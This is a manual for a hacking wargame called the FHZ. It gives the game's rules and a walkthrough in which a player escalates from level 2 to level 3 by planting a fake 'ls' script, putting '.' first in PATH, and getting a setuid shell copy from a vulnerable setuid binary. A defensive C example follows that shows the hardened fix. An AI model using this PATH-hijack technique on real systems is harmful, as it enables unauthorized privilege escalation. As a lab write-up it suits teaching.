FHZ Manual Hints

In the FHZ, you can satisfy your intellectual curiosity without having to worry about the legal consequences of your actions.
We hope you will get the most out of our FHZ by applying your hacking skills and techniques. However, it is important that you observe the following rules:

  1. You are free.
    • Your actions are free from any restrictions in the FHZ.
    • You can compile or execute any programs.
    • However, you are prohibited from doing things which may block or interrupt the smooth process of other people's activities.

  2. A different ID and password are assigned to each level.
    • When you obtain a password for the next level, your level will be upgraded.
    • The FHZ consists of 15 levels.
    • When you have an EUID for the next level, you must execute the "/bin/pass" program and then you will get a password.

  3. Hints for level upgrading
    • You can get hints for level upgrading by visiting the FHZ homepage.

  4. Under no circumstances should you interfere with or inconvenience other people's activities.

  5. Under no circumstances should you carry out DoS (Denial-of-Service) attacks.
    • Please note that DoS attacks from inside or outside the FHZ will prevent others from participating.



Here is an example of how an FHZ member, named Mr. X, successfully moved from level 2 to level 3.
HINT: There is a certain vulnerability in a hidden file that is located in the device driver directory.
$ id
uid=1002(level2) gid=1002(level2)
$ whoami
level2
$ find /dev -perm -4000 -o -perm -2000
/dev/haha
$ ls -al /dev/haha
-rwsr--- 1 level3 level2 50052 Jun 18 20:33 /dev/haha
$ /dev/haha

Mr. X examines the file with setuid permission.

ls -al /var/tmp
total 2
drwxrwxrwt 2 root root 1024 Jul 20 11:44 ./
drwxr-xr-x 19 root root 1024 Jun 25 18:34 ../
prw------- 1 root root 0 Apr 1 04:38 taper00480eaa|
prw------- 1 root root 0 Apr 1 04:39 taper00480faa|
prw------- 1 root root 0 Apr 1 04:39 taper00480gaa|
prw------- 1 root root 0 Apr 1 04:47 taper00620eaa|


Here, Mr. X realized that executing the "haha" program causes the command ls -al /var/tmp to be executed. He knew the difference between an absolute path and a relative path, and he judged that it is dangerous for a program in the system to execute another program through a relative path instead of an absolute path. For this reason, he went on to solve the problem, expecting that he would be able to create a hole by manipulating the PATH variable.
$ cd /tmp
$ cat > ls << EOF
/bin/cp /bin/sh /tmp/sh
/bin/chmod 4755 /tmp/sh
EOF
$ chmod 755 /tmp/ls
$ ls -al /tmp/ls
-rwxr-xr-x 1 level2 level2 47 Jul 26 16:00 /tmp/ls

First, create the ls shell script. Next, run this shell script.
Then you should get a shell.

$ PATH=.:$PATH
$ export PATH

This adds the current directory "." to the front of the PATH environment variable.

$ /dev/haha
$ ls -al /tmp/sh
-rwsr-xr-x 1 level3 level3 377992 Jun 20 16:30 /tmp/sh
$ /tmp/sh
$ id
uid=1002(level2) gid=1002(level2) euid=1003(level3)

This is how Mr. X obtained the privileges of level 3.
To see the password for level 3, do the following:

$ /bin/pass

123451234

123451234 - This is the password for level 3
Try to connect via telnet. 

$ telnet localhost
Trying 127.0.0.1...
Connected to localhost.
Escape character is '^]'.

Login: level3
Password:
Last login: Mon Jul 26 15:31:37 from xxx.xxxx.xxx.xxx

Starting Hacking-free-zone......
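
The weakness Mr. X relied on is that a setuid program ran ls by name, so the lookup went through a PATH he controlled. The following C code is an added example, not the source of /dev/haha or any FHZ code: it puts that pattern beside a hardened form that runs /bin/ls by absolute path with a fixed environment. All function names, the replacement PATH value, and the PATH check are assumptions made for illustration.

```c
/* Added example; hypothetical, NOT the real /dev/haha source. */
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <sys/types.h>
#include <sys/wait.h>
#include <unistd.h>

/* Weak pattern: "ls" is looked up through the caller's PATH. */
int list_tmp_weak(void) {
    return system("ls -al /var/tmp");
}

/* Returns 1 if PATH has an entry resolved against the current directory:
 * ".", any other non-absolute entry, or an empty entry ("a::b", "a:"). */
int path_has_unsafe_entry(const char *path) {
    if (path == NULL)
        return 1;               /* unset PATH: implementation default */
    for (const char *p = path;;) {
        size_t len = strcspn(p, ":");
        if (len == 0 || p[0] != '/')
            return 1;
        if (p[len] == '\0')
            return 0;
        p += len + 1;
    }
}

/* Hardened pattern: absolute path, no shell, fixed environment. */
int list_tmp_hardened(void) {
    char *const argv[] = { "ls", "-al", "/var/tmp", NULL };
    char *const envp[] = { "PATH=/bin:/usr/bin", NULL };
    int status;
    pid_t pid = fork();
    if (pid < 0)
        return -1;
    if (pid == 0) {
        execve("/bin/ls", argv, envp);
        _exit(127);             /* only reached if execve failed */
    }
    if (waitpid(pid, &status, 0) < 0)
        return -1;
    return WIFEXITED(status) ? WEXITSTATUS(status) : -1;
}

int main(void) {
    if (path_has_unsafe_entry(getenv("PATH")))
        fputs("warning: PATH has a cwd-relative entry\n", stderr);
    return list_tmp_hardened();
}
```

With the hardened form, the PATH=.:$PATH setting from the walkthrough has no effect on which ls binary runs, because execve never consults PATH.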